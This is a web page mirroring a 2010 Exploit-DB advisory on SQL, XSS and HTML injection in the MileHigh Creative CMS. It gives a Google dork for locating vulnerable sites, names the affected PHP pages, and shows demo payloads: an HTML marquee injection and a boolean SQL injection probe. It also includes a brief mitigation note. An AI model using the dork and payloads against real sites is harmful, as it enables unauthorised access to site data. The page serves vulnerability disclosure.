header-logo
Suggest Exploit
vendor:
MileHigh Creative
by:
XroGuE
8,8
CVSS
HIGH
SQL/XSS/HTML Injection
89, 79, 80
CWE
Product Name: MileHigh Creative
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities

MileHigh Creative is vulnerable to multiple injection vulnerabilities, including SQL, XSS, and HTML injection. An attacker can exploit these vulnerabilities by crafting malicious input and sending it to the vulnerable application. This can allow the attacker to gain access to sensitive information, execute arbitrary code, and modify the application's data.

Mitigation:

Input validation should be used to prevent malicious input from being sent to the application. Additionally, the application should be configured to use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

=======================================================================
# MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm XroGuE member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################
# Name: MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.milehighcreative.com
# Date: 2010-05-29
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
########################################################################

[+] Dork: inurl:"contentPage.php?id=" & inurl:"displayResource.php?id=" & ...
intext:"Website by Mile High Creative"


[+] Vulnerabilities:

contentPage.php
contentFolder.php
displayResource.php


[+] XSS InjecTion Vulnerability:


[+] Demo:
http://server/contentPage.php?id=
http://server/displayResource.php?id=
http://server/contentFolder.php?parentId=

0R

http://server/contentPage.php?id=
http://server/displayResource.php?id=
http://server/contentFolder.php?parentId=

########################################################################

[+] HTML InjecTion Vulnerability:
[+] Demo: http://server/contentPage.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>

########################################################################

[+] SQL InjecTion Vulnerability:
[+] Demo: http://server/contentFolder.php?parentId=1+and+1=1 [and+1=2]


########################################################################

Navigation

Suggest Exploit

Services By CQR